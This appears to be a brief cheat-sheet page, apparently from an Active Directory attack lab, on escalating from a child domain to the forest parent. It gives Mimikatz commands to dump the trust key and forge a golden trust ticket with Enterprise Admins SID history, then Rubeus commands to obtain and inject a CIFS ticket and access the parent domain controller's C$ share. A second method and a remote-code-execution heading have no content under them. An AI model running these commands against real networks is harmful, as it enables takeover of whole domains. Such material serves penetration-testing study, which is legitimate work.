Escalating from child to parent domain
Method 1: Trust ticket
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dcForging trust ticket
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /rc4:[trust key] /service:krbtgt /target:[parent domain] /ticket:[ticket name]"'Invoke-Rubeus -Command "asktgs /ticket:[trust ticket name] /service:CIFS/[parent domain controller FQDN] /dc:[parent domain controller FQDN] /outfile:[trust name]"Invoke-Rubeus -Command "ptt /ticket:[ticket name]"ls \\mcorp-dc.moneycorp.local\c$Method 2: Krbtgt hash
Remote code execution on forest root domain controller
Last updated